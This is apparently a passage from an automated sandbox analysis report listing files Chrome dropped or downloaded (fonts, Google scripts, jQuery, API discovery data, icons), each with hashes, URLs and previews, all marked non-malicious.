                                                          Preview:L..................F.@.. ...$+.,....,A.b....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYZ:.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYZC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYZC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYZE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............mb.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Feb 25 17:02:08 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                          Category:dropped
                                                          Size (bytes):2679
                                                          Entropy (8bit):3.99579145745195
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:06FFEE6DAE1878FCE89850D954069AC9
                                                          SHA1:10CD7492E516BD21CD246B50F7D191E912980722
                                                          SHA-256:99D8F6B49EC31BD3A90939BF64C10CBA8824DE85C51F2CCA0772B36028E924E5
                                                          SHA-512:B18CC3A0557E72AB1B086795ABF484A4FB1AC173977CB31DD6241D34328D0843D8E07591510FE834C0BF1DF08DCD4CCCE3C8932CF016A8B6E245FCCAE6147121
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.@.. ...$+.,.......b....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IYZ:.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VYZC.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VYZC.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VYZC............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VYZE............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............mb.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):18536
                                                          Entropy (8bit):7.986571198050597
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8EFF0B8045FD1959E117F85654AE7770
                                                          SHA1:227FEE13CEB7C410B5C0BB8000258B6643CB6255
                                                          SHA-256:89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
                                                          SHA-512:2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                          Preview:wOF2......Hh..........H..............................Z..|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.|.......%*..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`*m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R*...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.*+.M E..`......R.$T
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 190152
                                                          Category:dropped
                                                          Size (bytes):61052
                                                          Entropy (8bit):7.996159932827634
                                                          Encrypted:true
                                                          SSDEEP:
                                                          MD5:C1E82BF71ADD622AD0F3BF8572F634FC
                                                          SHA1:6CA863D4CAB96669202548D301693B3F5F80B0D5
                                                          SHA-256:BA48AF15D297DB450DC4870242482145ADDB2D18375A4871C490429E2DC5464A
                                                          SHA-512:820A7F8A0C8EA33A8FE1E90CDC35F45DC1E143E836B0D8EA047E1E312F8CAEC72CDEE4E7DB54760A4D749CD0ACFE103A27E39A9A56EB2D704E448A67B0D0C079
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...........iw.F.0.....'W...4)/qH#..D.L.EK...................().}.{..@.z........Qz.,..Ox.....i4..S.&.p......9..W....);a.].a....Y......Y<,.n..."`Is....5....P..|.-..x1.F...@...yRlG.O..5.Q.|.gy.c.^....r.EC.....xd.oL..$./..|3.......r^.j.}...M... )x.D.....%.....B..t....vZ....2L......px.G.1.*.lZYh...$.....,.../.a..;Q...._..#.....e.T.:trA_.0.:.f...........(I.x?.S...<7...o..0.`r.x.+.2..o+...4/..vzY7.C'.....!.r..4n....]P.+a..........._.8,..G>...{.4B....o.9.....r......X3..U.....'.0.@...lrX....r.W\e...].}....(.l......=........3....S..........^=D..[.zw6..e...<WQ.w.(.X..S....>.^.....^B..O-.(..U.R;h..v.......4.Dc .?..z....r.._.Y......M.a.?,...?..U.....OF.w\h$.Q..5....Q.Oj ....5U..8..Y......gYZM....y..OrY.z]B..y..;o.....oT.r...H..{K...Y&Q.......*..W....N4.......].0m..m........E.bc..~..e.. .nzS.i3^......).,Y}.=1H...... V...g.)....X..G...C....@o,.i.~...as...ehEH....u9l.2...y\J.?.(.I.q%..F#..D../>pr$...,...m.6..:,<s..~S.fl;k.'<..}z.Y.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (5960)
                                                          Category:downloaded
                                                          Size (bytes):334961
                                                          Entropy (8bit):5.600339358362851
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:6BD6F6FB78BC4493E324FE481D259B67
                                                          SHA1:2AE6A84CE6EA6F867572F75142FE4404E28D10B8
                                                          SHA-256:7BA0C42EACFC3DB2FD1F302F60162C6C2CB84EFE8F3C0CBB3821833151E84727
                                                          SHA-512:129CBAE226AB9E76227A6DAEF11E76B89423BFDC944B176D547873D35A0162EAD72BCB4C0FD9E1ACB7150E139C791D807C591C008E7C48E8911FD298893A650E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.googletagmanager.com/gtag/js?id=G-S4FJY0X3VX
                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_dma","priority":10,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":105},{"function":"__ogt_1p_data_v2","priority":10,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2049)
                                                          Category:downloaded
                                                          Size (bytes):14462
                                                          Entropy (8bit):5.470007102266433
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B8259706B5108415626907BF2C54AA07
                                                          SHA1:0FA8C75809261361AE939A907C343C19EF68BB2B
                                                          SHA-256:A7B60851E1DEA227EFE0DD89129AF73602514F8A906C3292EC91E96F80CEB38A
                                                          SHA-512:C1B67F084C3D3F0E39D6E803F68D1A7A0795C7AE0530C03A5BB6FE7C99031F9411EA76714CABA200093AB867815737CCC65378F2F6A8512FECEEE9D5847466BC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://apis.google.com/js/client.js
                                                          Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (1395)
                                                          Category:dropped
                                                          Size (bytes):322644
                                                          Entropy (8bit):5.520046680421142
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:83729D5CAF1498D990D6F432B004B9A6
                                                          SHA1:27EFB2F1768108B689656FEF81CFD77B6894E76D
                                                          SHA-256:D5A190885BCCC900ED8BDFFEBE61F3641FB0D27A831113D36B1832EC11178E39
                                                          SHA-512:EFDDC0DB2B5EF80362DE78E4F9DD66693A298FDFA5C69C1634BB06FBAB9B447234465E0BC3A841B6133B11F45CA9C2336D0D47DA251BDE034D13CE4EE94A2FAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                                          Category:downloaded
                                                          Size (bytes):18588
                                                          Entropy (8bit):7.988601596032928
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:115C2D84727B41DA5E9B4394887A8C40
                                                          SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                                          SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                                          SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                                          Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:downloaded
                                                          Size (bytes):32097
                                                          Entropy (8bit):4.926666731375466
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:32A9827B209598DFAC4ECDE0E24541B2
                                                          SHA1:DB68E47DABD4AA31698851FFE92172E37DDC9811
                                                          SHA-256:F2CECC075637F00A3F7020E74C019CC6C50D595F4BF67E77C73AED78CDEA68A0
                                                          SHA-512:8FCE85DD5D2A7B26E178EEA15C702858C8204C699A1C35356E6A85A1F560C6ACCF8C13122D2FA76FE87D9A3D4B3C3B8A13549952509B8049F64E6CFDC4150E2B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-sheets.googleapis.com/$discovery/rest?version=v4&pp=0&fields=fields%5B%22kind%22%5D%2Cfields%5B%22name%22%5D%2Cfields%5B%22version%22%5D%2Cfields%5B%22rootUrl%22%5D%2Cfields%5B%22servicePath%22%5D%2Cfields%5B%22resources%22%5D%2Cfields%5B%22parameters%22%5D%2Cfields%5B%22methods%22%5D%2Cfields%5B%22batchPath%22%5D%2Cfields%5B%22id%22%5D&key=AIzaSyAng4TaCSbwmEwKIdn9M0m9ZHpzjAkbMw8
                                                          Preview:{"servicePath":"","parameters":{"access_token":{"type":"string","description":"OAuth access token.","location":"query"},"alt":{"type":"string","description":"Data format for response.","default":"json","enum":["json","media","proto"],"enumDescriptions":["Responses with Content-Type of application/json","Media download with context-dependent Content-Type","Responses with Content-Type of application/x-protobuf"],"location":"query"},"callback":{"type":"string","description":"JSONP","location":"query"},"fields":{"type":"string","description":"Selector specifying which fields to include in a partial response.","location":"query"},"key":{"type":"string","description":"API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.","location":"query"},"oauth_token":{"type":"string","description":"OAuth 2.0 token for the current user.","location":"query"},"prettyPrint":{"type":"boolean","description":"Returns
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):217
                                                          Entropy (8bit):4.859841943923714
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:5687C66C1B440611982A7836A6CB7B3A
                                                          SHA1:AA2AE264F9502D713202FB81A2A12097DAFBF9C6
                                                          SHA-256:A8DFD68C9BC8E1CEA1B1C1C13F18AE82229A1845471EACB05C1E3A25F7D8D83D
                                                          SHA-512:F802B83966C8E809F7CBBE571B5F6B928271D7914691C7A7B79CDF36FC727CB69407855CE4C0F7CE3E13A0AB06477A937FC21EB5CD3834CDE00D650A91AB3AC7
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M4 15h2v3h12v-3h2v3c0 1.1-.9 2-2 2H6c-1.1 0-2-.9-2-2m11.59-8.41L13 12.17V4h-2v8.17L8.41 9.59 7 11l5 5 5-5-1.41-1.41z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:downloaded
                                                          Size (bytes):284
                                                          Entropy (8bit):4.804020988763619
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:F6E063941521CD8808A2F8AA5B6CEBA7
                                                          SHA1:3DF1B9A549C6F90ADF0217465436CDA8B8B175C9
                                                          SHA-256:00F190C275BEAFBABB14D0ADC6127DBB136B8A050517210F865CC1D4D3D95E35
                                                          SHA-512:2760FD17A9C7FC97399F6768957D2178852AFC516E183B438EB876CE1EE824B2F656754D77469A03B83A988640C2C2B6BE8E3DFFA7B12D70C0C7E65AF65577C0
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://www.gstatic.com/images/icons/material/system_gm/svg/link_24px.svg
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M17 7h-4v2h4c1.65 0 3 1.35 3 3s-1.35 3-3 3h-4v2h4c2.76 0 5-2.24 5-5s-2.24-5-5-5zm-6 8H7c-1.65 0-3-1.35-3-3s1.35-3 3-3h4V7H7c-2.76 0-5 2.24-5 5s2.24 5 5 5h4v-2z"/><path d="M8 11h8v2H8z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):688
                                                          Entropy (8bit):4.68435318910506
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:FC4C8318C22999772C605D5C35C44F3F
                                                          SHA1:5EC86BD0A42F30E11D2541970AC4DEDE3CA81BE6
                                                          SHA-256:A544E74D36A274308FE895768063E248E8FDA83C29F526354A25FDE89B8AC2D0
                                                          SHA-512:20B99C63133BF0A6A0D91F6D3C4DC88426F7877FB6630D920BC8E12AF2CCA0E402477680AEF7E871E467A4B54102F9FE7890F10ADF17D05DE2FCF7F91F6A59AA
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:{. "error": {. "code": 403,. "message": "Requests from referer \u003cempty\u003e are blocked.",. "status": "PERMISSION_DENIED",. "details": [. {. "@type": "type.googleapis.com/google.rpc.ErrorInfo",. "reason": "API_KEY_HTTP_REFERRER_BLOCKED",. "domain": "googleapis.com",. "metadata": {. "httpReferrer": "\u003cempty\u003e",. "service": "sheets.googleapis.com",. "consumer": "projects/371237729773". }. },. {. "@type": "type.googleapis.com/google.rpc.LouserzedMessage",. "locale": "en-US",. "message": "Requests from referer \u003cempty\u003e are blocked.". }. ]. }.}.
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (2049)
                                                          Category:downloaded
                                                          Size (bytes):14478
                                                          Entropy (8bit):5.470092501181737
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:86FEDE8BE7FFAC7DF5D247115E7F4D12
                                                          SHA1:C57DE81B88892016A304AAE99D209AA3D0AC0432
                                                          SHA-256:E01393EF09D086E63CC45A3B9A0BC590E21C8E48CFB56B2E50F3E76403088E47
                                                          SHA-512:199B0F2A0C1F81DF38A813553E15C903CBAD4BDD440129142E52C99FEE648F44BD0D564A9F8D47E18CB2001C58C54FAB534CFB4F58AA3C0F55B03E4E28A8485F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://apis.google.com/js/googleapis.proxy.js?onload=startup
                                                          Preview:(function(){var aa=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ba=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},ca=ba(this),g=function(a,b){if(b)a:{var c=ca;a=a.split(".");for(var d=0;d<a.length-.1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&aa(c,a,{configurable:!0,writable:!0,value:b})}},h=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regular expression");return a+""};.g("String.prototype.endsWith",function(a){return a?a:function(b,c){var d=h(this
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:SVG Scalable Vector Graphics image
                                                          Category:dropped
                                                          Size (bytes):339
                                                          Entropy (8bit):4.689999737907317
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:4DE8C3652F285AA52639648C01E57BE7
                                                          SHA1:449C913AA5290201B20A97695A74B8DBEBA149EB
                                                          SHA-256:92121D0499048670A707DDD136C4340964B1050A346FAF113905E0EE84FB222D
                                                          SHA-512:A895F3EAA9D9E8B5EDF82AB99DE92FA362408F195D23779D8D3161637D4805DCD0908B0054652BAB0B8912072038A61CAC94F44F877BA8384B7154600F66A01B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><path d="M9 12c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4zm0-6c1.1 0 2 .9 2 2s-.9 2-2 2-2-.9-2-2 .9-2 2-2zm0 7c-2.67 0-8 1.34-8 4v3h16v-3c0-2.66-5.33-4-8-4zm6 5H3v-.99C3.2 16.29 6.3 15 9 15s5.8 1.29 6 2v1zm3-4v-3h-3V9h3V6h2v3h3v2h-3v3h-2z"/></svg>
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):102
                                                          Entropy (8bit):4.8639794164334775
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:B454F2385193B0FBC52B7285FC0458FC
                                                          SHA1:ED7CA0C947F8E3712D37C47E1D6FBF7BCB45EECB
                                                          SHA-256:C7820BF4EE2B212BC2071DDEA83E03F07CEE6F848AC45E3B0FEB2FD3823119DC
                                                          SHA-512:64902A26B3BF64AC44339A85DBD4A177EFEF53FBBCFF2DDDA9486D611A0A2B12B5608D43BBC723A64D11A70042AFC1B0DFE64B2D0034C9B6F1B8CE3BFE564013
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:importScripts('https://www.gstatic.com/recaptcha/releases/IyZ984yGrXrBd6ihLOYGwy9X/recaptcha__en.js');
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):16
                                                          Entropy (8bit):3.75
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:AFB69DF47958EB78B4E941270772BD6A
                                                          SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
                                                          SHA-256:874809FB1235F80831B706B9E9B903D80BD5662D036B7712CC76F8C684118878
                                                          SHA-512:FD92B98859FFCCFD12AD57830887259F03C7396DA6569C0629B64604CD964E0DF15D695F1A770D2E7F8DF238140F0E6DA7E7D176B54E31C3BB75DDE9B9127C45
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAknYz0AMK3iOhIFDVNaR8U=?alt=proto
                                                          Preview:CgkKBw1TWkfFGgA=
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65447)
                                                          Category:dropped
                                                          Size (bytes):89501
                                                          Entropy (8bit):5.289893677458563
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                          Category:downloaded
                                                          Size (bytes):650593
                                                          Entropy (8bit):5.183511089866504
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1004323F57FD881517FE9BB42CD5639A
                                                          SHA1:906A1659DF9C523050BBBE306F2B32A624964C50
                                                          SHA-256:897A988C3F6E6208A726FACFC0E2DEA4FCFAEEE05F09C738604F2DCE4650B3D8
                                                          SHA-512:1FFFDBDD689EF03CBCA129E58FDC06A50D4883BF15CC474206D246837F2A9A51588630C2A3DA7BDE582207C0A98E57330634A0F4409308999A4AF1D8C59AFF87
                                                          Malicious:false
                                                          Reputation:unknown
                                                          URL:https://content-people-pa.googleapis.com/$discovery/rest?pp=0&fields=fields%5B%22kind%22%5D%2Cfields%5B%22name%22%5D%2Cfields%5B%22version%22%5D%2Cfields%5B%22rootUrl%22%5D%2Cfields%5B%22servicePath%22%5D%2Cfields%5B%22resources%22%5D%2Cfields%5B%22parameters%22%5D%2Cfields%5B%22methods%22%5D%2Cfields%5B%22batchPath%22%5D%2Cfields%5B%22id%22%5D&key=AIzaSyAng4TaCSbwmEwKIdn9M0m9ZHpzjAkbMw8
                                                          Preview:{"id":"people_pa:v2","version":"v2","parameters":{"access_token":{"type":"string","description":"OAuth access token.","location":"query"},"alt":{"type":"string","description":"Data format for response.","default":"json","enum":["json","media","proto"],"enumDescriptions":["Responses with Content-Type of application/json","Media download with context-dependent Content-Type","Responses with Content-Type of application/x-protobuf"],"location":"query"},"callback":{"type":"string","description":"JSONP","location":"query"},"fields":{"type":"string","description":"Selector specifying which fields to include in a partial response.","location":"query"},"key":{"type":"string","description":"API key. Your API key identifies your project and provides you with API access, quota, and reports. Required unless you provide an OAuth 2.0 token.","location":"query"},"oauth_token":{"type":"string","description":"OAuth 2.0 token for the current user.","location":"query"},"prettyPrint":{"type":"boolean","desc
                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          File Type:HTML document, ASCII text
                                                          Category:downloaded
                                                          Size (bytes):432
                                                          Entropy (8bit):5.305069202940503
                                                          Encrypted:false
                                                          SSDEEP:
                                                          MD5:1FC99A9A9C280F42A517C00FBDE9F993
                                                          SHA1:FDB6D1D54FFBD897A646415AC0D4A81A602101E2
                                                          SHA-256:AE4CB41413263FBF2025AF9429592413EED62D8EB85D5ADDCCC02FDE67D3F809
